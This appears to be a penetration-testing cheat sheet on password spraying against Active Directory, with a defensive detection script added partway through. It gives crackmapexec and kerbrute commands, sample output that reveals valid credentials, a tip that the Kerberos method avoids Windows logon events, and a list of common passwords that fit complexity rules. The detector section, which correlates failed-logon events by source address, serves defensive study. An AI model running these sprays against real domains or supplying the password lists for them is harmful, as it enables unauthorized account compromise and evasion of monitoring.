PASSWORD SPRAYING

Spray with crackmapexec

One password, all users — Check lockout policy first

crackmapexec smb <DC_IP> -u users.txt -p 'Password1' --continue-on-success
Example Output
crackmapexec smb 10.10.10.5 -u users.txt -p 'Winter2025'
SMB  10.10.10.5  445  DC01  [-] corp\administrator:Winter2025
SMB  10.10.10.5  445  DC01  [-] corp\john.smith:Winter2025
SMB  10.10.10.5  445  DC01  [+] corp\jane.doe:Winter2025
(FOUND VALID CREDS)

Spray with kerbrute

Kerberos-based spray — Stealthier than SMB

kerbrute passwordspray -d <domain> users.txt 'Password1' --dc <DC_IP>
Example Output
kerbrute passwordspray -d corp.local users.txt 'Winter2025' --dc 10.10.10.5
[+] VALID LOGIN: jane.doe@corp.local:Winter2025
(Kerberos-based, doesn't generate Windows logon events)
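
Detection view of both sprays above (SMB and Kerberos), as an added example that is not part of the original cheat sheet: a failed SMB logon is recorded as event 4625, and a failed Kerberos pre-authentication is recorded on the DC as event 4771 when Kerberos Authentication Service auditing is enabled, so the sketch below correlates both by source address. The event tuples, addresses, account names and thresholds are constructed assumptions, not values from the page.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Wrong-password failures: 4625 (failed logon, e.g. over SMB) with Sub Status
# 0xC000006A, and 4771 (Kerberos pre-authentication failed) with code 0x18.
BAD_PASSWORD = {(4625, "0xc000006a"), (4771, "0x18")}

# Constructed sample events: (time, event ID, status, source IP, account).
SAMPLE_EVENTS = [
    ("2025-01-15T09:00:01", 4771, "0x18", "10.10.10.99", "administrator"),
    ("2025-01-15T09:00:02", 4771, "0x18", "10.10.10.99", "john.smith"),
    ("2025-01-15T09:00:03", 4771, "0x18", "10.10.10.99", "alice.wong"),
    ("2025-01-15T09:00:04", 4625, "0xC000006A", "10.10.10.99", "bob.lee"),
    ("2025-01-15T09:00:05", 4625, "0xC000006A", "10.10.10.99", "svc_backup"),
    ("2025-01-15T09:10:00", 4625, "0xC000006A", "10.10.20.14", "carol.diaz"),
    ("2025-01-15T09:10:20", 4625, "0xC000006A", "10.10.20.14", "carol.diaz"),
    ("2025-01-15T09:10:45", 4625, "0xC000006A", "10.10.20.14", "carol.diaz"),
    ("2025-01-15T09:30:00", 4771, "0x12", "10.10.20.30", "old.account"),
]

def detect_spray(events, window=timedelta(minutes=30), min_accounts=4,
                 max_per_account=2):
    """Flag sources failing against many accounts, few tries per account."""
    by_source = defaultdict(list)
    for ts, event_id, status, source, account in events:
        if (event_id, status.lower()) in BAD_PASSWORD:
            by_source[source].append((datetime.fromisoformat(ts), account.lower()))
    findings = []
    for source, failures in sorted(by_source.items()):
        failures.sort()
        best, start = None, 0
        for end in range(len(failures)):
            # Slide the window start forward until it spans at most `window`.
            while failures[end][0] - failures[start][0] > window:
                start += 1
            counts = Counter(acct for _, acct in failures[start:end + 1])
            # Spray signature: wide across accounts, shallow per account,
            # so no single account reaches the lockout threshold.
            if (len(counts) >= min_accounts
                    and max(counts.values()) <= max_per_account
                    and (best is None or len(counts) > len(best["accounts"]))):
                best = {"source": source, "accounts": sorted(counts),
                        "first_seen": failures[start][0].isoformat()}
        if best:
            findings.append(best)
    return findings

if __name__ == "__main__":
    for finding in detect_spray(SAMPLE_EVENTS):
        print(finding)
```

Per-account lockout counters never trip on this pattern, which is why the grouping key is the source address rather than the target account.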

Common passwords to try

Predictable patterns — Match complexity requirements

Password1, Welcome1, <Season><Year> (Winter2025), <Company>1, Password123, Changeme1
Example Output
Password1     <- most common
Welcome1      <- second most common
Winter2025    <- current season + year
Corp2025!     <- company name + year
Changeme1     <- default reset password
(Match password policy: 7+ chars, uppercase, number)